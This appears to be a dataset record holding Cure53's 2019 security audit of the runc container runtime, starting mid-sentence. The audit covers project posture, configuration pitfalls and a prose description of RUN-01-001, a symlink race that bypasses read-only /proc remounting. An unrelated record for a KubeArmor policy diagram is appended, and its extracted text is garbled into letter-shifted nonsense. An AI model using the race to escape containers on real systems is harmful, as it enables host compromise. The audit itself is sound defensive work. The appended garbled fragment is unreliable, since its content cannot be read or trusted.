The aforementioned accidentally\ncovered real-life issue, together with the relevant PoC and credit for the original finder, is\nthen documented. Cure53 additionally furnishes mitigation advice, so to ascertain that\nCure53, Berlin · 12/06/19 2/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nthe runc team can address this hard-to-find and tricky problem. The report closes with a\nconclusion in which Cure53 summarizes this 2019 project and issues a verdict about the\nsecurity premise of the investigated runc scope.\nScope\n•runc v1.0.0-rc9\n◦runc codebase\n▪https://github.com/opencontainers/runc/tree/master \n▪Commit: 46def4cc4cb7bae86d8c80cedd43e96708218f0a\n◦runc project’s security posture and maturity levels\nTest Methodology\nThe following paragraphs describe the metrics and methodologies used to evaluate the\nsecurity posture of the runc project and codebase. In addition, it includes results for\nindividual areas of the project’s security properties that were either selected by Cure53\nor singled out by other involved parties as needing a closer inspection.\nAs noted in the Introduction, the test was divided into two phases, each fulfilling different\ngoals. In the first phase, the focus was on the general security posture of the code and\nthe project. Furthermore, Cure53 examined the processes that the runc development\nteam has made available for security reports, also as relates disclosure and general\nhardening approaches. In the second phase, the work has shifted to the manual source\ncode review of specific code areas.\nPhase 1: General security posture checks\nIn this component of the assessment, Cure53 looked at the General security posture of\nthe runc project and inspected the overall code quality from a meta-level perspective.\nSome of the indicators taken into account encompassed test coverage, security\nvulnerability disclosure process, approaches to threat modeling and general code\nhardening measures. The sum of observations from across these areas have been used\nto describe the maturity levels of this project at a meta-level, independently of the\nsecurity qualities of the provided code and created binaries.\nLater chapters in this report will dive into the details of the inspected items, justifying\nthese choices and presenting the results in the specific case of the runc software project.\nCure53, Berlin · 12/06/19 3/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPhase 2: Manual code auditing\nFor this component, Cure53 performed a Small-scale code review and attempted to\nidentify security-relevant areas of the project’s codebase and inspect them for common\nflaws.\nUnlike standard processes in a usual penetration test and code audit, this phase only\ntook a few days. As such, it was a brief rather than an in-depth inspection. It should be\nseen as an initial probing aimed at evaluating whether more thorough code audits should\nbe recommended. The goal was not to reach an extensive coverage but to gain an\nimpression about the overall quality. 
The completed tasks assist Cure53 in making a\njudgment call as to whether runc needs additional tests and what kinds of tests these\ncould be.\nLater chapters in this report will shed more light on what was being inspected, why and\nwith what implications for the runc software complex.\nPhase 1: General security posture checks\nThis phase is meant to provide a more detailed overview of the runc project’s security\nproperties that are seen as somewhat separate from both the code and the runc\nsoftware itself. To facilitate clear flow and understanding, this section is divided into two\nsubsections, where the first part consists of elements specific to the application and the\nproject. The second part looks at the elements linked more strongly to the\norganizational/team aspect. Lastly, each aspect below is taken into account and an\nevaluation of the overall security posture is based on cross-comparative analysis of all\nobservations and findings.\n•A general high-level code audit was undertaken to arrive at a solid judgment of\nthe entire runc project, in particular with the task of checking for unsafe patterns\nand coding styles.\n•The complete project structure was analyzed; the main call flow was mapped; the\nindividual sub-components were enumerated and the supported platforms were\nchecked.\n•The project’s external and third-party dependencies were cross-checked for\nproblematic components.\n•The provided documentation was examined in order to learn about the provided\nfunctionality and the depth of instructions available to the developer.\n•Relevant runtime- and environment-specifications were examined in connection\nwith the general project solution domain.\nCure53, Berlin · 12/06/19 4/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Past vulnerability reports and postings were checked to see in which areas\ncertain errors had previously emerged, also in assessing the likelihood of their\nreappearance.\n•An in-depth static code analysis was carried out to check for applicability of\nautomated measures. The scan results were verified for usability.\n•The project’s maturity was evaluated; specific questions about the software were\ncompiled from a general catalog according to individual applicability.\nApplication/Service/Project Specifics\nIn this section, Cure53 will describe the areas that were inspected to get an impression\non the application-specific aspects that lead to a good security posture, such as choice\nof programming language, selection and oversight of external third-party libraries, as\nwell as other technical aspects like logging, monitoring, test coverage and access\ncontrol.\nLanguage Specifics\nProgramming languages can provide functions that pose an inherent security risk and\ntheir use is either deprecated or discouraged. For example, strcpy() in C has led to many\nsecurity issues in the past and should be avoided altogether. Another example would be\nthe manual construction of SQL queries versus the usage of prepared statements. The\nchoice of language and enforcing the usage of proper API functions are therefore crucial\nfor the overall security of the project.\nrunc is written in Go, which inherently provides memory safety and broadly offers a\nhigher level of security in comparison to e.g. C/C++. This is further underlined by only\nmaking use of the Go’s unsafe package if absolutely necessary, in particular when\ninterfacing with the operating system. 
The code is written with best practices in mind,\nwhich helps not only with auditing, but also with maintenance. The above indicators\ncontribute to a healthy security posture and seem well-understood and properly spread\nthroughout the runc codebase. Specific examples include:\n•Nesting being avoided by handling errors first;\n•Separating test-cases from code;\n•Documenting all relevant code;\n•Keeping documentation/items concise;\n•Separating independent packages;\n•Avoiding unnecessary repetitions.\nThe usage of unsafe is limited on runc to syscall functionality where unsafe pointers are\nabsolutely required and implementation cannot be achieved otherwise. The unsafe\nCure53, Berlin · 12/06/19 5/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nconstructs are solely used as pointers for return values from prctl() and similar low-level\nsystem calls.\nThough some vendor code containing dangerous-looking marshalling code (see\ncilium/ebpf/marshalers.go ) was identified, those fragments are apparently not actively\nused anywhere in the production codebase.\nExternal Libraries & Frameworks\nWhile external libraries and frameworks can also contain vulnerabilities, it is nonetheless\nbeneficial to rely on sophisticated libraries instead of reinventing the wheel with every\nproject. This is especially true for cryptographic implementations, since those are known\nto be prone to errors.\nrunc makes use of external libraries, therefore avoiding reimplementation of already\nexisting solutions. Since runc is heavily dependent on functionalities that are exposed by\nthe Linux kernel, it makes extensive use of third-party packages like\ngolang.org/x/sys/unix to provide a more portable interface to the underlying operating\nsystem. To safeguard a good alternative for file system interactions, packages like\nfilepath-securejoin are used as well. Generally no concerns were found to be present in\nthe used third-party packages. All appear to be widely recognized by the community and\nappear to be under active development.\nConfiguration Concerns\nComplex and adaptable software systems usually have many variable options which can\nbe configured according to the actually deployed application necessities. While this is a\nvery flexible approach, it also leaves immense room for mistakes. As such, it often\ncreates the need for additional and detailed documentation, in particular when it comes\nto security.\nContainers created with runc can have security pitfalls due to the flexibility of the\nconfigurations. Those pitfalls are not explicitly addressed by the documentation and\nrequire deep knowledge about Linux to even have a general awareness about them.\nExamples for such pitfalls are described in the following paragraphs.\nIn a default setup, runc makes the hosts dmesg output available inside the containers\nunless kernel.dmesg_restrict=1 is set on the host system. It includes information about\nthe kernel, which means that in some cases it might disclose certain details to an\nattacker. This especially holds for an adversary who already has access to a runc\ncontainer and needs more information in order to escape the environment. There is no\nreason why this information should be retrievable from a sealed container. Such\nCure53, Berlin · 12/06/19 6/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 
14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \ninformation leaks can easily be prevented by blocking the respective syslog system call\nvia seccomp and this is highly advised.\nThe /proc filesystem is a special virtual filesystem included in Linux. It generally requires\nbeing mounted inside a container because a lot of software relies on it. It is also the\nplace where security settings like AppArmor are applied and files that have direct effect\non the underlying system are exposed. In essence, the /proc/sys/kernel/core_pattern file\ncontrols how core files are handled when a process crashes. It also allows to specify a\ncommand that is executed, thus it could potentially be used to break out of the container.\nThat is why the default config generated by runc spec, as well as configs from Docker\nand podman, specify that paths like /proc/sys need to be remounted as read-only.\nBecause this is not documented, new projects that build upon runc might not be aware\nof this danger and may forget to include the read-only settings. It is recommended to\nfollow up on this issue.\nAnother nuance is shown in RUN-01-001, where the order of mounts can have a large\nsecurity impact. podman mounts shared volumes before the /proc filesystem, enabling\nthe race condition in the first place, even though the Docker configs mount the /proc\nfilesystem first. The proposed revision of the sequence is not a guaranteed fix to the\nunderlying issue, but it does mitigate the specific PoC.\nIt should also be noted that the race condition uses a shared volume, though runc\nconfigs can also define the same rootfs for multiple containers. Using the same rootfs\nallows a race condition independent from the mount order. Implementations such as\nDocker and podman define unique rootfs for each container, and thus do not suffer from\nthis issue. However, a new project using runc might not be aware of the risk in a shared\nrootfs.\nBecause of the described security-relevant issues, It is recommended to provide better\ndefault configuration files and add exhaustive explanations of security considerations to\nthe shipped documentation.\nAccess Control\nWhenever an application needs to perform a privileged action, it is crucial that an access\ncontrol model is in place to ensure that appropriate permissions are present. Further, if\nthe application provides an external interface for interaction purposes, some form of\nseparation and access control may be required.\nrunc has a divided access control model in place, which makes the topic of access\ncontrol rather complex. The framework itself offers a subset of functionality that can be\nconfigured in order to limit access for running containers. The general access control\nCure53, Berlin · 12/06/19 7/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nmodel is shared between the hosts responsible for implementation and runc. By default,\nrunc offers the possibility to run rootless containers as well as build tags, which control\nindividual access for a given container.\nLogging/Monitoring\nHaving a good logging/monitoring system in place allows developers and users to\nidentify potential issues more easily or get an idea of what is going wrong. 
It can also\nprovide security-relevant information, for example when a verification of a signature fails.\nConsequently, having such a system in place has a positive influence on the project.\nrunc makes use of logrus1, a structured logging system that is compatible with Golang’s\nstandard library logger. Although logrus offers a transparent API that replaces the\nstandard logging functionality, runc explicitly invokes logrus when needed. It would make\nsense to centralize its usage by globally overriding the intrinsic log feature. This is\nbecause then uniform logging could be consistently applied throughout the entire\ncodebase. Despite this rather small point of critique, runc tries to make sure that every\nerror is explicitly caught in log files. This additionally counts for the newly created\ncontainer namespaces and child processes which rely on logpipes. Container events are\nequally treated via the events command line interface. A useful addition, though likely\nhard to implement, would be a mechanism for logging exploitation attempts. Considering\nprevious breakout exploits that abuse vulnerabilities such as CVE-2019-5736, it might\nmake sense to include a warning mechanism that makes administrators aware of\nattackers that try to abuse previous vulnerabilities.\nUnit/Regression Testing\nWhile tests are essential for any project, their importance grows with the scale of the\nendeavor. Especially for large-scale compounds, testing ensures that functionality is not\nbroken by code changes. Further, it generally facilitates the premise where features\nfunction the way they are supposed to. Regression tests also help guarantee that\npreviously disclosed vulnerabilities do not get reintroduced into the codebase. Testing is\ntherefore essential for the overall security of the project.\nA containerized unit- and integration-tester are shipped by runc and can easily be\ninvoked via the package-provided makefile. This speeds up building test environments\nby making sure that necessary environments are present. While integration tests are\ncentralized in runc’s codebase, unit-testing is spread out across a multitude of project\nfiles, thus making it harder to recognize whether specific functionalities are covered by\nunit-testing scripts or not. At the same time, unit-testing looks fine and covers areas\nranging from config parsing to cgroups handling, as well as filesystem tests for\ncontainers. However, regression testing is missing, especially as regards assessment of\n1 https://github.com/sirupsen/logrus\nCure53, Berlin · 12/06/19 8/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nwhether fixes for previously disclosed vulnerabilities remain valid. Despite requiring\nadditional engineering effort, reifying that is highly recommended.\nDocumentation\nGood documentation contributes greatly to the overall state of the project. It can ease\nthe workflow and ensure final quality of the code. For example, having a coding\nguideline which is strictly enforced during the patch review process ensures that the\ncode is readable and can be easily understood by a spectrum of developers. Following\ngood conventions can also reduce the risk of introducing bugs and vulnerabilities to the\ncode.\nThe runc project makes a relatively positive impression as far as the existing\ndocumentation is concerned. 
While a good amount of information is present, it is\nsomewhat scattered around and makes it hard to obtain a full picture of the software\ncomplex. Thus, it is possible to overlook one or the other documented pitfall. On the one\nhand, it may also be advantageous to get more detailed descriptions of the function of\nthe namespaces and cgroups in relation to runc. On the other hand, highly sensible\ndevelopment principles2 and equally detailed maintainer guidelines3 underline the\nearnest approach the developers are taking.\nOrganization/Team/Infrastructure Specifics\nThis section will describe the areas Cure53 looked at to find out about the security\nqualities of the runc project that cannot be linked to the code and software but rather\nencompass handling of incidents. As such, it tackles the level of preparedness for critical\nbug reports within the runc development team. In addition, Cure53 also investigated the\ndegree of community involvement, i.e. through the use of bug bounty programs. While a\ngood level of code quality is paramount for a good security posture, the processes and\nimplementations around it can also make a difference in the final assessment of the\nsecurity posture.\nSecurity Contact\nTo ensure a secure and responsible disclosure of security vulnerabilities, it is important\nto have a dedicated point of contact. This person/team should be known, meaning that\nall necessary information such as an email address and preferably also encryption keys\nof that contact should be communicated appropriately.\n2 https://github.com/opencontainers/runc/blob/master/PRINCIPLES.md3 https://github.com/opencontainers/runc/blob/master/MAINTAINERS_GUIDE.md\nCure53, Berlin · 12/06/19 9/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAlongside security notes4, runc offers the relevant contact’s email address\n(security@opencontainers.org ). However, the document omits important details, such as\nthe respective PGP keys and an outline of the disclosure process. Upon handling the\nreporting of the vulnerability described in RUN-01-001, Cure53 found the response times\nunsatisfactory. Specifically, an answer was only issued after additional inquiry. A\nseemingly completely unrelated email address for handling security requests\n(secalert@redhat.com ) was provided by the developers later in the process. As such, it\nis highly recommended to improve this area, first by making sure security researchers\ncan encrypt their reports by including a PGP key and, secondly, by making sure that the\nreporting and disclosure processes are transparently outlined. A revised strategy in this\nrealm will make it easier for the researchers to understand the type of information to\ninclude and which answers they can expect when.\nSecurity Fix Handling\nWhen fixing vulnerabilities in a public repository, it should not be obvious that a particular\ncommit addresses a security issue. Moreover, the commit message should not give a\ndetailed explanation of the issue. This would allow an attacker to construct an exploit\nbased on the patch and the provided commit message prior to the public disclosure of\nthe vulnerability. 
This means that there is a window of opportunity for attackers between\npublic disclosure and wide-spread patching or updating of vulnerable systems.\nAdditionally, as part of the public disclosure process, a system should be in place to\nnotify users about fixed vulnerabilities.\nBoth SECURITY.md and CONTRIBUTING.md of runc discourage filing of vulnerabilities\ndirectly into GitHub. They rather propose sending an email to the appropriate security\ncontact. runc additionally employs a mailing list meant for distribution vendors to share\nactionable information when severe security issues occur. This is a good practice and\nmakes sure that distributions are notified early on about upcoming security fixes.\nUsually, this increases the pace of supplying updated packages. Fixed vulnerabilities are\neasily identified in their respective GitHub commits. While not being tagged accordingly,\nthey typically mention the related CVE number, so that a clear connection between the\nfix and vulnerability can unfortunately be made easily.\nBug Bounty\nHaving a bug bounty program acts as a great incentive in rewarding researchers and\ngetting them interested in projects. Especially for large and complex projects that require\na lot of time to get familiar with the codebase, bug bounties work on the basis of the\npotential reward for efforts.\n4 https://github.com/opencontainers/org/tree/master/security\nCure53, Berlin · 12/06/19 10/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe runc project does not have a bug bounty program at present, however this should\nnot be strictly viewed in a negative way. This is because bug bounty programs require\nadditional resources and management, which are not always a given for all projects.\nHowever, if resources become available, establishing a bug bounty program for runc\nshould be considered. It is believed that such a program could provide a lot of value to\nthe project.\nBug Tracking & Review Process\nA system for tracking bug reports or issues is essential for prioritizing and delegating\nwork. Additionally, having a review process ensures that no unintentional code, possibly\nmalicious code, is introduced into the codebase. This makes good tracking and review\ninto two core characteristics of a healthy codebase.\nIn runc, bugs which are not security-related should be handled via GitHub and users are\nable to directly submit pull requests. The developers seem to have a firm grip on the\nprocess of submitting, triaging and reviewing such changes.\nEvaluating the Overall Posture\nIn general, the security posture of runc makes a good impression, as it can be derived\nfrom the judgments made about the individual items above. The short code audit and the\nhistory of previous vulnerabilities clearly show that there is not too much reason for\nconcern. The handling of a security issues should probably be improved and could\nbenefit from the incentives for reporting security issues. Nevertheless, the project has a\ngood stance when it comes to its overall security posture.\nChoosing Go has been a great decision and automatically reduces the potential for\nintroducing memory safety-related issues. Additionally, the rather complete\ndocumentation along with the established processes for patch reviews further reduce the\nrisk of security vulnerabilities. 
A topic worth-mentioning is that of a bug bounty program:\nsince these require good funding, it is understandable that smaller projects are likely\nunable to secure these. However, with future growth of the project and potentially\nincreased resources, bug bounty scheme should definitely be considered.\nCure53, Berlin · 12/06/19 11/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPhase 2: Manual code auditing & pentesting\nThis section comments on the code auditing coverage within areas of special interest\nand documents the steps undertaken during the second phase of the audit against the\nrunc software complex. Cure53 describes the key aspects of the manual code audit\ntogether with manual pentesting and, since only one major issue was spotted, attests to\nthe thoroughness of the audit and confirms the high quality of the runc project.\n•runc was partially manually pentested on the server generously provided by the\ndevelopment team and partially examined on local systems.\n•A variety of container setups have been created to gain a deeper understanding\nof the outer and inner workings of runc.\n•The code responsible for dealing with mount-points was explicitly audited for\ncommon exploitation possibilities.\n•Derailing runc by using symlinks was attempted in the context of the /dev\nfilesystem but this could not be achieved.\n•Abusing core dumping to the host via symlinks along with spawning zombie\nprocess while killing their parent processes has led nowhere.\n•It was audited to what extent interfering with the /proc filesystem could lead to\nAppArmor not being applied correctly.\n•It was checked if any privileged processes were reaching into containers with the\nintent of escaping the respective container by default.\n•Several typical runc invocations were traced to see which operations and\nespecially system calls are being used to create a container.\n•It was attempted to locate TOCTOU errors in handling files/path; the\nEnsureProcHandle() is used properly.\n•It was investigated what the impact of shared namespaces would be, but failing\nto join mount/pid namespaces5 stopped these efforts.\n•The access controls handled by runc were audited to figure out what the\nexpectations on the host system are.\n•The integration of CRIU with respect to abusing its invocation via runc-\ncheckpoint and runc-restore was investigated.\n•The codebase was audited for all aspects of terminal attachment functionality, in\nparticular process invocation and the recvtty/console code were examined.\n•The runc code was audited for problems in check-pointing and handling of root\nfilesystems.\n•The code handling of Intel RDT was given extra care, especially as regards file-\nhandling and filesystem/scheme writing.\n•The file path normalization code down the Go core library was audited. It was\nseen as pretty straightforward and purely lexical, with no potential for affecting\nsymlinks.\n•The securejoin code was analyzed and pentested with respect to symlinks in file\npaths, including some core library functionality.\n5 https://github.com/opencontainers/runc/issues/1700\nCure53, Berlin · 12/06/19 12/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 
14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMounting/Binding and Symlinks\nThe code responsible for mounting volumes and binding filesystems was inspected,\nparticularly in connection with symlinks and filename/path traversal/normalization.\nCure53 was making sure it was impossible to escape out of a container via the\nfilesystem. This was given extra care, since it had been pointed out as a focus area by\nthe runc development team. In essence, one maintainer requested looking for ‘ways to\nescape containers via symlinks and mounts from within the root filesystem’ and ‘binding\n/mnt to /mnt inside the container, /mnt being a traversing link akin to ../../’.\nWhile no obvious vulnerabilities in the core library could be identified, the discussion of\nthese efforts nevertheless indirectly led to the discovery of RUN-01-001 by the\nindependent party, namely Leopold Schabel ( leoluk).\nIt has to be noted that the applied path-based approach used within the runc codebase\nis generally not race-safe, even as far as the application of the filepath-securejoin\npackage is concerned. These path aspects, quite prone to race-conditions, should\neventually be reworked to handle paths via filedescriptors and cease using textual file\npaths, as evidenced by the related issue6.\nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. RUN-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nRUN-01-001 Race-condition bypassing masked paths (High)\nThrough relationships to various security researchers, an interesting opportunity for a\nsecurity review emerged. Leopold Schabel (aka leoluk), who had previously reported an\nissue as a publicly disclosed runc7 vulnerability, discovered a race-condition involving\ntwo containers that can be used to bypass the read-only remounting of the potentially\ndangerous /proc filesystem paths.\nThe issue was reported by the discoverer at midnight UTC on the 26th/27th of\nNovember 2019 and has been included in the documented security mailing list of\nsecurity@opencontainers.org . The steps to reproduce the issue with podman can be\n6 https://github.com/containers/crun/issues/1117 https://github.com/opencontainers/runc/issues/2128\nCure53, Berlin · 12/06/19 13/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nfound on the respective gist. Additional reproduction steps for runc are available by\nfollowing the link.\nThe attack requires a rootfs in container-2 where /proc is symlinked to a folder like\n/evil/layer/proc. This target folder has to be inside of a volume shared by container-1 and\ncontainer-2. When container-2 is started, runc will first mount procfs by following the\nsymlink into the shared volume to /evil/layer/proc. Then container-1 has to win a race\ncondition, whereas container-1 switches the mount-point from /evil/layer/proc to\n/evil/layer~/proc. This means the procfs in container-2 is now in /evil/layer~/proc, and not\nin /evil/layer/proc. However, runc trusts the path and continues with the setup. 
Eventually\nrunc will remount dangerous procfs paths as read-only, yet does so by following the\nsymlink into the normal folder at /evil/layer/proc. This means that the dangerous procfs\npaths were not remounted as read-only. After container-1 switches the mount point\nback, container-2 gains a writable access to the dangerous procfs paths.\nDuring this investigation, the discoverer also realized that the fix for issue #2128,\nspecifically the function EnsureProcHandle() , could also be bypassed with this attack.\nSymlinks can be used to point critical files like /proc/self/attr/%s to other procfs files, thus\npassing the checks. However, runc will write AppArmor settings to the wrong file.\nIt should be noted that these issues are very difficult to fix because file paths are\ninherently prone to race conditions. For general file handling, it is advised to work with\nfiledescriptors rather than paths, but there is no equivalent mount syscall that takes\nfiledescriptors. Documenting these risks and attack surface can help projects building on\ntop of runc while mitigating such issues. This can be done, for example, by using much\nmore restrictive configurations.\nCure53, Berlin · 12/06/19 14/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions & Verdict\nThis assessment of the runc complex generally concludes on a positive note. Cure53,\nrepresented in this assessment by a team of seven testers, can conclude that the project\nheld well to scrutiny and exhibits numerous indicators of taking security seriously. After\nbeing commissioned to perform this assessment by CNCF and having spent eighteen\ndays on the scope, Cure53 arrived at positive verdict for both phases of the project.\nConsequently, it can be stated that the runc complex passed general security posture\nchecks (Phase 1) and exposed no major mistakes in its coding practices ( Phase 2).\nTo give some context, this is one in a series of high-level assessments created by\nCure53 for a CNCF-selected project, which contraposes classic code audits and\npentests. From the meta-level of code quality and project structure to the employed\ncoding patterns and coherent style, the runc project is quite impressive. Offering a\nverdict, Cure53 must underline that the runc processes and documentation are of high\nquality, even though some room for improvement has been identified. The state of the\nsoftware system is sound and mature.\nAmong the main positive conclusions, Cure53 wishes to point out that the static code\nanalysis did not reveal any problems of significance, meaning that automated testing will\nmost likely not yield results with the current state of technology. The choice of\nimplementation language and external components further attests to the solid stance of\nthe system. The general design principles and development guidelines are highly\nsensible and unusual in that sense.\nIn terms of items that are currently evaluated as possibly calling for further attention,\nCure53 needs to note the lack of proper regression testing and the seemingly\nunstructured application of unit-tests within the codebase. Those should be reconsidered\ntogether with the redesign of documentation, which was found somewhat difficult to\nmaneuver, in particular as regards the configuration notes being scattered.\nThe sole security issue discovered by a third-party during this engagement was used to\ntest the security incident handling processes. 
This generally appeared to be subpar,\nsince the reaction times were slow and the actual handling was referred to a contact\nperson who is not documented in the project’s security guidelines. In this context, even if\nthe resources for the project are clearly limited, the creation of a bug bounty program\nwould be greatly beneficial to incentivize security researcher community. The race\ncondition described in RUN-01-001 uncovered a general problem of handling file paths\ntextually. It is recommended to rethink the approach and possibly replace it with a\nfiledescriptor-based solution to make it race-safe.\nCure53, Berlin · 12/06/19 15/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nDrawing on the findings stemming from this 2019 CNCF-funded project, Cure53 can\nstate that the runc project is mature and safe, even though improving some aspects\nwould lead to a greater praise. Notably, runc is being used widely in the container- and\norchestration-realm, and this seems to be for very good reasons. The project can only\nbe recommended for continued large-scale deployment. Ongoing development\naccording to the minimal design principles and maintainer guidelines should keep the\nsystem solid in a long-term\nCure53 would like to thank Michael Crosby and Philip Estes from the runc team as well\nas Chris Aniszczyk of The Linux Foundation, for their excellent project coordination,\nsupport and assistance, both before and during this assignment. Special gratitude also\nneeds to be extended to The Linux Foundation for sponsoring this project.\nCure53, Berlin · 12/06/19 16/16" } ]
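The report stresses that paths such as /proc/sys must end up read-only inside a container and that purely path-based mount handling is race-prone. The following is a minimal sketch of a read-only bind-remount using golang.org/x/sys/unix, assuming CAP_SYS_ADMIN in the target mount namespace; it is not runc's implementation and does not by itself address the symlink race described in RUN-01-001:

```go
package main

import (
	"log"

	"golang.org/x/sys/unix"
)

// remountReadOnly bind-mounts path onto itself and then flips the bind
// mount to read-only. This mirrors the "remount dangerous paths as
// read-only" idea discussed in the report; it is a sketch only.
func remountReadOnly(path string) error {
	// First create a bind mount of the path onto itself.
	if err := unix.Mount(path, path, "", unix.MS_BIND|unix.MS_REC, ""); err != nil {
		return err
	}
	// Then remount the bind read-only, keeping common hardening flags.
	flags := uintptr(unix.MS_BIND | unix.MS_REMOUNT | unix.MS_RDONLY |
		unix.MS_NOSUID | unix.MS_NODEV | unix.MS_NOEXEC)
	return unix.Mount("", path, "", flags, "")
}

func main() {
	// Requires privileges; intended to run inside the container's mount namespace.
	if err := remountReadOnly("/proc/sys"); err != nil {
		log.Fatalf("remount read-only failed: %v", err)
	}
}
```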
{ "category": "Provisioning", "file_name": "kubearmorhostpolicy-spec-diagram.pdf", "project_name": "KubeArmor", "subcategory": "Security & Compliance" }
[ { "data": "NFUBEBUBname: [policy name]namespace: [namespace name]TQFDTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOPEF4FMFDUPSNBUDI-BCFMTLFZ\u001eWBMVFQSPDFTT\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFTPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GJMF\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001GJMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFT\nPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOFUXPSL\nNBUDI1SPUPDPMTQSPUPDPM\u001b\u0001\\\u0001UDQ\u0001]\u0001VEQ\u0001]\u0001JDNQ\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>DBQBCJMJUJFT\nNBUDI$BQBCJMJUJFTDBQBCJMJUZ\u001b\u0001\\\u0001OFU@SBX\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VE